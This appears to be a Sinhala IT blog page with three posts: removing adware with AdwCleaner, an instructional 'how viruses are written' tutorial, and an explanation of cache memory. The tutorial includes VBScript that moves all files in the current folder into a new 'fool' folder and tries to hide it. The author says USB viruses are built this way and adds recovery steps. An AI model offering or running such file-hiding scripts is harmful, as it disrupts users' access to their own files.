Tuesday, March 22, 2016

කරදරකාරී වෙබ් අඩවි නිතර විවෘත වනවාට පිළියම

පරිශීලකයාගේ අනුදැනුමෙන් තොරව, අනවශ්‍ය වෙබ් අඩවි නිතර වෙබ් සුපරීක්‍ෂක තුළ විවෘත්ත වීම ඉතා කරදරකාරී සිදුවීමක් මෙන්ම වර්ථමාන පරිගණක පරිශීලකයන්ගේ මානසික ආතතිය වැඩිවීමට ද හේතුවන සිදුවීමකි.

වෙබ් සුපරීක්‍ෂක තුළ අනවශ්‍ය වෙබ් අඩවි විවෘත්ත වන්නේ ඔබේ පරිගණකය තුළ ක‍්‍රියාත්මක වන මැල්වෙයාර් හේතුවෙන් වේ. බොහෝවිට මෙවැනි මැල්වෙයා ඔබේ පරිගණකයට ඇතුලු වන්නේ ඔබ විසින්ම ඔබේ පරිගණකයේ පිහිටුවනු ලබන නිසි වගකීමක් නොමැති මෘදුකාංග සම`ග වේ.

ඔබගේ පරිගණකයට ඇතුළු වූ කරදරකාරී මෘදුකාංග ඉවත්කිරීම සඳහා විවිධ ක‍්‍රම භාවිතා කළ හැකි නමුත් AdwCleaner මෘදුකාංගය භාවිතා කිරීම වඩාත් පහසු ක‍්‍රමය වේ.

මෘදුකාංගය මෙතනින් බාගත කරගන්න


පරිගණක වෛරස් ලියන්නේ මෙහෙමයි

වසර ගණනාවක් පුරා විවිද වයස්මට්ටම් වල ළමුන්ට තොරතුරු තාක්‍ෂණය පිළිබඳව ඉගැන්වීම් කටයුතු සිදුකරන මා අවබෝධකරගත් එක් කරුණක් වන්නේ ඔවුන් පරිගණක වෛරස ලිවීම හා හැක් කිරීම පිළිබඳව මහත් උනන්දුවක් දක්වන බවයි. මෙයට හේතුව වියහැක්කේ පරිගණක වෛරස ලිවීම හා අනුන්ගේ තොරතුරු සොරාගැනීම මහා වීර ක‍්‍රියාවක් ලෙස සමාජගතව තිබීමයි.

වෛරස් ලියන්නන් මහා වීරයන් නොවන බවත් එය කුඩා දරුවෙකුට වුවත් කළහැකි සරල ක‍්‍රියාවක් බවත් පෙන්විම සඳහා මෙම ලිපිය ඉදිරිපත් කිරීමට අදහස් කළෙමි.

ඩොස් හා වින්ඩෝස් මෙහෙයුම් පද්ධති මත වෛරස් ලියන්න batchfile භාවිතා කිරීමේ හැකියාව තිබුනත් වින්ඩෝස් රූප මාධ්‍යක අතුරුමුහුණත් තුළ වෛරස් ලියන්න හොඳම ක‍්‍රමය තමයි Windows Script Host (WSH) මත VBScript එකක් ලියන එක.

මේක හරිම ලේසි වැඩක් කරන්න තියෙන්නේ මෙච්චරයි. Notepad එක විවෘත්ත කරල අදාල VBScript එක ටයිප් කරන්න එකට කැමති නමක් දීල File extension එක vbs දීල කැමති තැනක ගබඩා කරගන්න. ඊට පස්සේ ෆයිල් එක උඩ Double click කරන්න.

වෛරස් ලියන්න කලින් පහත සරල VBScript එක අත්හදා බලමු.

WScript.Echo "You are Fool"
WScript.Quit

(ඉහත code කොටස Notepad එකට පිටපත් කර fool.vbs නමින් Desktop එකේ Save කර නිර්මාණය වුනු file එක උඩ ඩබල් ක්ලික් කරන්න)


මෙහෙයුම් පද්ධතියට අදාල බොහෝ කාර්යයන් පහසුවෙන් කරගන් පුලූවන් නිසා පරිගණක ක‍්‍රමලේඛනයේ දී Administration tool එකක් වශයෙන් Windows Script Host භාවිතයට ගැනෙනවා. කෙසේ නමුත් වෛරස් ලියන්නන්ට මෙම පහසුකම තොතැන්නක් බවට පත්වී තිබෙනවා.


අපිත් ලියමු වෛරස්

පහත කේත කොටස මගින් ස්වයංකී‍්‍රයව File එක ගබඩා කර ඇති ස්ථානයේ fool නමින් Folder එකක් නිර්මාණය වේ.

dim filesys, newfolder, newfolderpath

set filesys=CreateObject("Scripting.FileSystemObject")

newfolderpath = filesys.GetAbsolutePathName(".")
newfolderpath = newfolderpath + "\fool"

If Not filesys.FolderExists(newfolderpath) Then
Set newfolder = filesys.CreateFolder(newfolderpath)
WScript.Echo("A new folder has been created at: " + newfolderpath)
else
WScript.Echo("Folder alrady exist")
End If 

(ඉහත code කොටස Notepad එකට පිටපත් කර foolfolder.vbs නමින් Desktop එකේ Save කර නිර්මාණය වුනු file එක උඩ ඩබල් ක්ලික් කරන්න)

fool folder එකට සියලූම file move කර එය hidden කිරීම සඳහා පහත කේතය අත්හදා බලන්න. 

dim filesys, newfolder, newfolderpath, curfolder, SourceFile

set filesys=CreateObject("Scripting.FileSystemObject")

curfolder = filesys.GetAbsolutePathName(".")
newfolderpath = curfolder + "\fool"

If Not filesys.FolderExists(newfolderpath) Then
Set newfolder = filesys.CreateFolder(newfolderpath)
End If 

SourceFile = curfolder + "\*.*"

filesys.MoveFile SourceFile, newfolderpath

If newfolder.Attributes = newfolder.Attributes AND 2 Then
newfolder.Attributes = newfolder.Attributes XOR 2 
End If

(ඉහත code කොටස Notepad එකට පිටපත් කර foolmove.vbs නමින් Desktop එකේ Save කර නිර්මාණය වුනු file එක උඩ ඩබල් ක්ලික් කරන්න)

බොහොමයක් USB Drivers සඳහා සැකසුනු වෛරස හදන්නේ මේ ක‍්‍රමයෙන්.

අවසන් වශයෙන් මේ දැණුම යහපත් දෙයකට යොදවනු ඇතැයි අපේක්‍ෂා කරමි.


ඉහත වැඩසටහණ අත්හදා බලපු අය ෆයිල් නැවත ලබාගැනීම සඳහා පහත පියවර අනුගමනය කරන්න. 

1. Open Folder Options by clicking the Start button , clicking Control Panel, clicking Appearance and Personalization, and then clicking Folder Options.

2. Click the View tab.

3.Under Advanced settings, click Show hidden files and folders, and then click OK.

කෑශ් මෙමරිය කුමට ද?

Why Cache Memory is Required



කෑශ් මෙමරියට හා සසම්භාවී ප‍්‍රවේශ මතකය ට පොදුවූ ලක්‍ෂණයක් තමයි ඒවායේ මතකය විදුලි බලය මත රඳා පැවතීම. විදුලිය විසන්දි වූ සැනින් මේවායේ ගබඩා කරතිබූ දත්ත සියල්ල මැකී යනවා. ඒ වගේම කෑශ් මෙමරියට වඩා විෂාල ධාරිතාවයක් සසම්භාවී ප‍්‍රවේශ මතකයට තියෙනවා. නමුත් සසම්භාවී ප‍්‍රවේශ මතකයේ දත්ත කියවන වේගයට වඩා ඉතා විෂාල වේගයකින් මධ්‍ය සැකසුම් ඒකකය දත්ත සැකසීම සිදුකරනවා. මෙම දත්ත හැසිරවීමේ විෂමතාවයට පිළියමක් වශයෙන් තමයි කෑශ් මෙමරිය භාවිතා වෙන්නේ.

කෑශ් මෙමරියේ දත්ත ගබඩා කිරීමේ හා කියවීමේ වේගය සසම්භාවී ප‍්‍රවේශ මතකයට වඩා ඉතා වැඩි නිසා මධ්‍ය සැකසුම් ඒකකය මගින් නිතර භාවිතයට ගන්නා දත්ත වල පිටපත් කෑෂ් මෙමරිය තුළත් තබාගන්නවා. නවීන මධ්‍යසැකසුම් ඒකක සතුව අවම වශයෙන් ස්වාධීන කෑශ් මෙමරි වර්ග තුනක් තිබෙනවා. ඉන් එකක් වන instruction cache මගින් සිදුවන්නේ ක‍්‍රියාත්මක කිරීමට අවශ්‍ය උපදෙස් මධ්‍ය සැකසුම් ඒකකයට රැගෙන ඒමේ වේගය වැඩිකිරීම යි.Data cache මගින් සිදුවන්නේ දත්ත රැගෙන ඒමේ සහ නැවත දත්ත ගබඩා කිරීමේ වේගය වැඩිකිරීම යි. Translation Lookaside Buffer (TLB) මගින්, අතථ්‍ය (virtual) ලිපිනයන් භෟතික ලිපිනයන් බවට පරිවර්තනය කරමින් උපදෙස් හා දත්ත යන දෙවර්ගයම හැසිරවීමේ වේගය වැඩිකර යි. මෙය memory management unit හි කොටසක් වශයෙන් ද පෙන්වා දිය හැක. Data cache ධූරාවලි මට්ටම් කිහිපයකට බෙදා දැක්විය හැකි අතර ඒවා L1, L2 ආදී වශයෙන් හැඳින්වේ.


-- හසල සිතුම් --

Hasala Sithum Wickramasinghe

Hasala Sithum Wickramasinghe

  • M.Sc in Information and Communication Technology
  • B.Sc in Computer Systems Engineering, Hons - Second Upper
  • National Diploma in Information and Communication Technology
  • Diploma in Programming
  • Diploma in Webpage Developing
  • Diploma in Graphic Designing and Desktop Publishing
  • Diploma in Webpage Designing
  • Diploma in Lithography
Contacts :
  • Mobile : 071 6 515 212
  • E-Mail : sithumwick@gmail.com